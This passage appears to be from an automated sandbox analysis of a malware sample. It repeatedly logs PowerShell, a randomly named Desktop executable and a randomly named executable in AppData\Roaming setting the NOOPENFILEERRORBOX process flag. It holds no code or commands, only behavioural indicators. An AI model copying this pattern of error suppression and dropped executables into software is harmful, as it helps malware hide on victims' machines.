                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeProcess information set: NOOPENFILEERRORBOX
